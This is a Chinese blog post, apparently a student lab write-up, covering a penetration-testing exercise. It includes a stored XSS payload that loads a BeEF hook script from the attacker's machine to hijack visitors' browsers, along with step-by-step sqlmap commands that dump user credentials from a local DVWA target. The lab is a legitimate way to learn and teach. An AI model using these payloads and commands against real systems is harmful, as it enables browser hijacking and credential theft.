网络渗透实验三:XSS用Beef劫持被攻击者客户端浏览器。Beef基础,SQL注入使用SQLMAP

已于 2022-11-29 19:17:14 修改
阅读量565 收藏 1
点赞数
文章标签: 安全 web安全 linux xss sql
于 2022-11-07 18:50:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62584974/article/details/127736807
版权

第一部分:XSS用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

kali和靶机都采用桥接模式。然后让kali和受害者连接同一个手机热点!!

IIS服务器配置情况:

把访问的默认界面设置为:Message.asp

ip分配情况:

 使用AWVS扫描发现有XSS漏洞

 Kali使用beef生成恶意代码,截图。

在kali上先安装beef-xss

然后输入命令:

beef-xss

访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

<script src="http://Kali的IP地址:3000/hook.js"></script>

<script src="http://Kali的IP地址:3000/hook.js"></script>

管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为百度,将你在beff中的配置截图。

受害者页面:为百度的主页面(放不了图)

让受害者屏幕弹出字体

beef-xss配置:

受害者视角:

SQL部分:

1.注入点发现

 输入1',出现报错,判断存在注入漏洞

2.枚举当前使用的数据库名称和用户名。 

使用sqlmap

输入命令:

sqlmap -u "URL" --cookie="COOKIE的值" --current  -db(当前数据库名称) --current-user(当前用户名称)

URL和COOKIE的值需要根据需求更改

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" --current-db --current-user

 

3.枚举数据库用户名和密码

使用sqlmap

命令:

sqlmap -u "URL" --cookie='COOKIE的值' -D 数据库名称 --string="Surname" --users --password

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de' -D dvwa --string="Surname" --users --password

 

4.枚举数据库

sqlmap命令:

sqlmap -u "URL"--cookie="COOKIE的值" --dbs (查询当前数据库)

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"--cookie="security=low;PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de" --dbs

5.枚举数据库和指定数据库的数据表

sqlmap命令:

sqlmap -u "URL" --cookie="COOKIE的值" -D dvwa(数据库名) --tables

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" -D dvwa --tables

 

6.获取指定数据库和表中所有列的信息

这里选择爆users表中的所有列

sqlmap命令:

sqlmap -u "URL" --cookie="COOKIE的值" -D dvwa(数据库名称) -T users (表的名称)--columns

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" -D dvwa -T users --columns

 

7.枚举指定数据表中的所有用户名与密码,并down到本地。

sqlmap命令:

sqlmap -u "URL" --cookie="COOKIE的值" -D dvwa(数据库名称) -T users(表的名称) -C user,password(求的字段名称) --dump

sqlmap -u "http://192.168.159.145/dvwa/vulnerabilities/sqli/?id=1212&Submit=Submit#" --cookie="PHPSESSID=c098eb10e92748a55c2e60c5ec1f57de;security=low" -D dvwa -T users -C user,password --dump

 

 

 

 

墨言ink
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全beef-xss实操以及xss修复方案
你在看屏幕的同时,屏幕也在注视着你
09-07 2208
beef-xss实操
BeEF-XSS实验手记
二歪的防痴呆笔记
04-02 2297
这里使用的是Kali里面预装的BeEF-XSS,在Kali里面打开 应用程序-08-漏洞利用工具集-beef XSS framework。 或者直接运行beef-xss命令运行: kali已经把beef-xss做成服务了,可以使用systemctl 命令来启动或关闭beef服务器 systemctl start beef-xss.service #开启beef systemctl sto...
2024年前端安全XSS,CSRF,网络劫持(1),2024年最新【秋招面试专题解析
最新发布
2401_84252743的博客
05-10 951
3. 类型1、Server论坛发帖、商品评价、用户私信等等这些用户保存数据的地方攻击者将恶意代码提交到目标网站的数据库中,用户开打该网站评论、内容的时候就会被攻击,用户浏览器收到html代码后,混入其中的恶意代码就会被执行比如获取用户的cookie信息,然后发送给攻击者的服务器。在实际开发中,开发人员要增强安全意识,为用户的信息安全保驾护航。这其实就涉及XSS的防御,要对2、Server攻击者通过各种手段,诱导用户点击恶意URL,通过URL传参数的过程,比如网站的搜索或者跳转。
利用Beef进行XSS会话劫持
Deeeelete的博客
02-09 1451
1.登入靶机中的DVWA环境,安全等级调到最低,进入xss环境界面2.打开自带的beef软件第一次使用会提示你修改密码vim /etc/beef-xss/config.yaml打开修改,将密码修改成其他任意的内容就可以重新打开软件了。保存退出然后重新打开软件就可以正常进入了登录密码就是我们刚才修改的,输入然后登录3.回到终端,因为beef打开会默认开一个终端和一个浏览器界面,我们找到beff为我们...
浏览器攻击框架BeEF Part 6:攻击用户与攻击浏览器
Fly_鹏程万里
08-24 707
前言 这一章介绍如何使用BeEF来攻击用户和浏览器,攻击用户和浏览器的效果相对于上一章来说比较简单,效果也直接有效。 查看之前的五篇文章: 攻击用户 攻击用户可分为三部分:内容劫持、捕获用户输入、社会工程学。 内容劫持 内容劫持是指替换被勾连的浏览器中当前页面内容,比如替换被勾连的浏览器中当前页面中所有的&lt;a&gt;元素的href。 BeEF自带了很多内容劫持相关的攻击模块: ...
浅谈一下xss工具----beef
划水的小白白
05-07 3542
今天主要聊一下,从认识xss的危害到beef-xss的利用 beef是一个类似与sql注入sqlmap一样,也是一种工具。 一、xss简介 定义: 跨站脚本攻击。xss是一种在web应用中的计算机安全漏洞, 它允许web用户将一些恶意代码植入到提供给其它用户使用的页面中 种类: 反射型xss: 提交得数据成功的实现了xss,但是仅仅是对你这次访问产生了影响,...
网络渗透实验三.docx
01-10
* 了解 SQL 注入攻击的基本原理:SQL 注入攻击是指攻击者 inject 恶意 SQL 代码到网站上,使得网站上的数据库被攻击。 * 了解防御 SQL 注入攻击的方法:包括输入验证、参数化查询、限制数据库权限等。 * 实验步骤: ...
网络渗透测试 XSSSQL注入
12-02
网络渗透测试 XSSSQL注入】的实验旨在深入理解网络安全中的两种常见攻击手法,并学习如何防范。XSS(跨站脚本攻击)和SQL注入都是针对Web应用的安全威胁,主要利用了程序处理用户输入的疏忽。 XSS攻击是攻击者...
信安网络渗透测试实验三.docx
12-15
1. 利用 Beef 劫持攻击者客户端浏览器。 2. 实验环境搭建:留言簿网站存在 XSS 漏洞。 3. 攻击者使用 beef 生成恶意代码,并通过留言方式提交到留言簿网站。 4. 被攻击者访问留言簿网站,浏览器劫持SQL 注入...
注入工具集合.zip
06-02
BeEF(The Browser Exploitation Framework)】同样专注于浏览器安全,通过JavaScript注入,可以控制受害者的浏览器,有时也能在特定情况下协助SQL注入攻击。 使用这些工具时,安全专家会遵循严格的道德准则,仅...
网络安全考题,面试题-含答案.pdf
02-06
网络安全是信息技术领域的重要组成部分,它涉及保护网络系统和数据免受未经授权的访问、攻击或破坏。这份名为"网络安全考题,面试题-含答案.pdf"的资料提供了丰富的网络安全相关问题和答案,涵盖了渗透测试、信息...
Kali中Beef使用教程
weixin_43287317的博客
04-02 5263
Kali中Beef使用教程
kali中浏览器攻击框架BeEF使用
爱国小白帽
02-24 7818
BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,至今还在维护。是由ruby语言开发的专门针对浏览器攻击的框架。这个框架也属于cs的结构 实验环境: PHPstudy 火狐浏览器、IE DVWA靶场 kali 安装: 新版kali里面没有需要安装,命令如下: apt-get install beef-x...
利用beef盗取浏览器cookie,并实现页面跳转
鲨鱼辣椒的博客
05-19 1868
实验环境 KALI kali中需要安装beef工具 DVWA靶场 客户端 我是在本地搭的靶场,然后开两台虚拟机,一台kali当作攻击者,一台任何系统的主机 搭建靶场 首先搭建靶场,开启phpstudy让让别人可以访问就可以了(我这边的靶场是安装好的,如果没有安装的话可以先去下载) 下载安装步骤:先去phpstady官网下载一个最新版的phpstudy(这个最新版的不用配置环境直接安装就能用特别方便),然后找到DWVS的数据包下载下来(如果找不到的话我可以发给你),放到phpstudy的ww
BeEF
zhaji001
09-17 1083
官方: https://beefproject.com/ GitHub: https://github.com/beefproject/beef kali启动beef: /usr/share/beef-xss# ./beef [15:07:21][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000]. [15:07:21][*]...
beef自动化攻击(5)
从来不在调
03-06 1088
环境metaspoit+beef.利用autorun自动7化攻击 时间就是胜利,在勾住浏览器那短短时间内,如何完成一次高质量攻击呢? 利用BEEF REST API和浏览器交互速度将会大大增强。 首先写一个自动脚本,检查是否有挂钩,然后自动利用模块攻击。 beef injection framework自带的 autorun就可以完成这个任务。首先适当编辑autorun.rb脚本 编辑如(下
BEEF的简介与使用
永远是少年
10-31 2131
今天继续给大家介绍渗透测试相关知识,本文主要内容是BEEF的简介与使用。 一、BEEF简介 二、BEEF渗透测试实战
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3450
Kali beef-xss实现Xss详细教程。
实验三 XSSSQL注入
m0_62685257的博客
11-21 661
实验三 XSSSQL注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值